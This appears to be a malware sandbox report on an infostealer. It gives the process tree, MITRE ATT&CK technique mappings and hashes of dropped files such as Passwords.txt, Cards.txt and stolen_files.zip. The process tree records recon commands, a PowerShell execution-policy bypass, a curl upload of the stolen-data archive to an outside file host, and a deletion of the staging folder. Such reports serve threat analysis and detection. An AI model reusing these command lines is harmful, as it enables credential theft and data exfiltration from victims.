C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
2⤵
PID:1160

C:\Windows\system32\getmac.exe
getmac /NH
3⤵
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:3820

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:2056

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:928

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:2520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:3140

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:4136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:3120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4952

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4156

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:4652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:2276

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:1060

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:4432

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:888

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:1572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:1536

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:1160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:464

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:1188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:3460

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:4384

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2316

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:3012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:1820

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:2108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
2⤵
PID:3572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Rhatqedq.zip";"
2⤵
PID:1060

C:\Windows\system32\curl.exe
curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Rhatqedq.zip";
3⤵
PID:2876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:4940

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:4420

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:3892

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2416

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1520

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
2⤵
PID:8

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:2352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4012

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:4220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:4688

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:2368

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:4636

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:5020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2128

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:3460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4428

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:3532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:60

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:1828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:1948

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:5100

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:2168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:1880

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:4652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:3536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:3320

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:2416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:3556

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:3012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:4968

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:4628

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:5032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2372

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:4996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:860

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:3668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:604

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:2244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:2556

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:2316

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:2056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2588

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:3656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:1548

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:2116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:1768

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:1232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:1644

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:1336

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:1668

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2896

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Steam\Launcher\EN-RHA~1\debug.log

Filesize
1KB

MD5
800d6a3a1fd76c9f48faa06e43498f3e

SHA1
cc8ebf6153a9ccca161d34552ce2ece43e0de3d1

SHA256
81113c501e5327f9b20856783405abe6334aad17b135170f3bdb6518a943e07e

SHA512
88914f5a28c9736c4a4de237757a7e653100cf859602f0d9642aaa1c9bc3edd83a788919ebf068122ea15b519c5e8fa8fb3697b21e9cbfdccbace88f1188436a

Download Submit
C:\ProgramData\Steam\Launcher\EN-Rhatqedq.zip

Filesize
2KB

MD5
9ed3c233e0c4ffa942b0a78b12d83148

SHA1
5f070208c3d9cf34457336198fb3eb60606a2eed

SHA256
47888fcb9357f1afb1a23fb9851b035fafcffe0089428b6b30d319bad63f9826

SHA512
f2f0e0af569c9409673f2a9c80088d6d1c5c87f16703639da2df23d03aa375315624b2cd0f044b2a0654d01648fcf1605b334fe7f125661e6af06cdb2b488732

Download Submit
C:\ProgramData\Steam\Launcher\EN-Rhatqedq\Autofills\Autofills.txt

Filesize
94B

MD5
2f308e49fe62fbc51aa7a9b987a630fe

SHA1
1b9277da78babd9c5e248b66ba6ab16c77b97d0b

SHA256
d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521

SHA512
c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

Download Submit
C:\ProgramData\Steam\Launcher\EN-Rhatqedq\Cards\Cards.txt

Filesize
70B

MD5
8a0ed121ee275936bf62b33f840db290

SHA1
898770c85b05670ab1450a96ea6fbd46e6310ef6

SHA256
983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709

SHA512
7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

Download Submit
C:\ProgramData\Steam\Launcher\EN-Rhatqedq\Discord\discord.txt

Filesize
15B

MD5
675951f6d9d75fd2c9c06b5ff547c6fd

SHA1
9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09

SHA256
60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244

SHA512
44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Download Submit
C:\ProgramData\Steam\Launcher\EN-Rhatqedq\Passwords\Passwords.txt

Filesize
78B

MD5
c5e74f3120dbbd446a527e785dfe6d66

SHA1
11997c2a53d19fd20916e49411c7a61bfb590e9c

SHA256
e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05

SHA512
a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

Download Submit
C:\ProgramData\Steam\Launcher\EN-Rhatqedq\Screenshots\Screenshot.png

Filesize
427KB

MD5
dcf30fc7d0276e547499961ffe629935

SHA1
341d6b9933d0699da5489cf9fb927f97d9a12410

SHA256
3ed5f43b5d920494dd4fdeafa77a7f9da83ad3bf7e3d5629607d6dd954f4135e

SHA512
f93ca4fdc2af178e1da9362128264b8cd326cb7064c0630078f508a8cceac9a05e3f9c881c8078eab9f975084b10369c29e92744a5bf4526a18d9efe50a5ef47

Download Submit
C:\ProgramData\Steam\Launcher\EN-Rhatqedq\Serial-Check.txt

Filesize
506B

MD5
488904e47fb07cbfec2be3498865b60d

SHA1
ad165b1af7282b7e621013ff0721eb01c085b658

SHA256
f5e1ff7abe1fc241b862936322f122d7a3bcea4dc02d380f10fc68329728d145

SHA512
b53b34c7ba1c942ab83c1721dde6f2260d4a8d1ed4d4855d91de1f366c4ec28c25441f6ac3570159b310d5cc988a15ea1aa0452f9de1b1d1bdd2869fda14f1b4

Download Submit
C:\ProgramData\Steam\Launcher\EN-Rhatqedq\debug.log

Filesize
1KB

MD5
cea0f5d89e77887ada504a8591592e4c

SHA1
9562eb735255a77569fc1afe3b8fb4746edb3424

SHA256
ab075a8b579caad77955d00ec612b53772804fdf1f498c3107ecd7b4404a71d9

SHA512
4ef2e378c2bed37534df0e6b33619ddb17a178e514f7013a24ae3759598e2f5fb1108d2143a8244fcf93c7874e58f63842dc3c3de89628763000203520e1cb3f

Download Submit
C:\ProgramData\Steam\Launcher\EN-Rhatqedq\stolen_files.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

Filesize
1KB

MD5
745cd559fffd2d5f70b73648edf9b3f6

SHA1
5e947c85945a3c4d530896d478abc066c04a2ac0

SHA256
40f1cb4b2a31741d50f3ddd3023096f94f18b5457a45d96e79cb0f4f786c96bd

SHA512
eb0c6ce871348073278e30c35b58e58020dc1ae27aa2ac27d74304f6914605ad08b7fec80f4e1996a5d073570f79b030ddbfad6568918e85717bb11065e31834

Download Submit
C:\ProgramData\edge\Updater\Get-Clipboard.ps1

Filesize
3KB

MD5
a8834c224450d76421d8e4a34b08691f

SHA1
73ed4011bc60ba616b7b81ff9c9cad82fb517c68

SHA256
817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5

SHA512
672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Download Submit
C:\ProgramData\edge\Updater\RunBatHidden.vbs

Filesize
146B

MD5
14a9867ec0265ebf974e440fcd67d837

SHA1
ae0e43c2daf4c913f5db17f4d9197f34ab52e254

SHA256
cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1

SHA512
36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1376f0affa7aae3a09956cd9fffaa71b

SHA1
a32d2c2a287ba86e74aab13976ab831f0a1a8393

SHA256
b834a2b13f901c294c47a3c0d3a34649040bc3925799fe8ffd77d20cae5de4cd

SHA512
c10c344234fb287bcda1a87a5e0ccf0572357d1397285ae2de6ddd15fda709256d192d2606d2e3d2d15a65c0d662419c515c775e345d78f5f1d6021daa90c445

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a5b0183a28f6217b123960e72cb894cf

SHA1
5fe1da4670c549feda65115751663934b4fbe27c

SHA256
62626c46ef0fc10d6d0e44dafef00eac04d64a6c57c1daba94a21f85cefcccec

SHA512
29082cb944e0d6542a715fef97ca7be97fac792e2241052940dd624ec2fa03280eb07866e9fb2a44084fd648499810421246341a310ec71914cae4e8f6318330

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c01aef0e85b520707fb9aa9303dd27e4

SHA1
6d1d670f6570c79ece79591af0190c6bf7ebbaca

SHA256
5128383e1d2fda6aebca30ca7012f78757ef3ce511a7f9c1b401a67f2b565e12

SHA512
7aca6f24e896f82cf5741d54e9b5eb45ed503ca96c5079ac07b04a3f4455ca24b704306c243fed2917013ed659f82a1fd43b47825e31c49850e1bf0179ecbd31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cd534e1651764234f516cd1e9fb099dc

SHA1
ba9974c146eef31b19cd9577d514342734a67517

SHA256
4058c5b6dc1f06d083ec2b08f5ad81bca3a11d0d5a5456b4ca2918dac9aafd0d

SHA512
d9e846e978cc58d0e1b28f05a3f77b5c5cc3722426d2f4fd4b89c98f19cd1c84186f5872987b4cc3551a5c20fcc961eaaf8042c2d45447449a0a508269b95124

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8fe70e63c44ca0ecd48b0180321927d3

SHA1
1419bf270210e065da1a4a36ef0d7f88ca89ee04

SHA256
f748e385e9b3b1eed95616ddc565f705187c5a9f5cc6a5e5ac132e43eb681eb2

SHA512
b01393a29399d9415c7247bcd309c44487ad8ffacb91fac34900d34a32d01fb5ef21492ae5573457015ee5f598901d85f99f2ba51da40c8b2285ae84bc7c6c61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ca24df1817fa1aa670674846e5d41614

SHA1
dac66ea013bcc46d24f1ece855568187c6080eaf

SHA256
3b9d5525002b14e4b5c044e80d3035420d037b48d94a1f836c5a253df0c539db

SHA512
fb1848fa381fa360171ba13e1aa15c7029ff543c806f34ae524f04bda637b48e1aa06e831843aa830173c0a218072da7f3d0bc52ce56364b888c53234a224631

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

Filesize
2KB

MD5
eab3276233d18b683c8c6a9d6dbec5a2

SHA1
c08ce622dc7e1bffb7f82b230d1132d94c1aeb1a

SHA256
1e01e2871e21a417376bf40ec6d0f4a52dae2fe82cd83553d4ae56ac48db9371

SHA512
cc3c5885d3b9d458f250a375fc8410dbbec6c33c203863c0881d70f12e80e132bc80853cb8eacc9e327f7a50d7aecbc91de8eeace987bb1f28208aeab2b35dea

Download Submit
C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4B90.tmp

Filesize
1KB

MD5
e49245a480def016262b43e61cf9cbaf

SHA1
5572176ec51de2551c6e26d0dc127a59d0f4957b

SHA256
822fb887493e4b1cd3512a22d5a896ba3f52389cdc571f83ec7dd9b6b373a5ce

SHA512
9caf6dd16126f57279c109e9815f32413133be10bb0fd481fd2876061efb924d8a938b1f985325ee015949951c905c8dfaa843d176bb6e02fa8b042cdab22aed

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES515C.tmp

Filesize
1KB

MD5
3f56727c98b5a5cf8433be97b5a144f4

SHA1
3a6e6d86f67a072733c0cd124bbc4d4324bd12e3

SHA256
dec9fd5f4e5c412d7bbe7c72599c7b7aa8b3e1cf08be31646325275c81ab51c4

SHA512
1a662d87f5ca0645729d9168292cf67da387276b68594824e9cc579411f35b27de66f1499ee87329df3f5684362274bc8c20b9a8ce03a0ed7ef0d4925e9fb352

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j2ftt5co.gxj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\apzshero\apzshero.dll

Filesize
3KB

MD5
6a5fee0b44ae484a6db99f5e600c7535

SHA1
fafa5f184bd4900950bc83463f4a8246c71f7b53

SHA256
0b5e68e370e63b42db583b00aa23f91fa250db67eae86bfbef8a5a29090e4a48

SHA512
95c9a90aeeb09a1ec7d61b53711ac73fef2e252d6b468120273ddbb631a1ae09933a321a33f0adb2ed2680902d736c16a05fe865fbcc163d5496a46a675eac1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\i53hqiit\i53hqiit.dll

Filesize
3KB

MD5
827a82246db1c2ae2ccc811ad1796dbe

SHA1
4996208ecc1b381e93ea168e4d9cf11221393542

SHA256
6bc378c9678c6812a50ad7cc036ecd2759c1740755e9a5eaf3d79ce291a26c42

SHA512
2f61a364dceb148ad3d2f01cbfa2763fb3423507c70f8009656dfe2c71b4ce5cc70a3fce72b71e8b00a75aa4e67702707c2bc33c66a45c6454ab30ae9b0c8cef

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
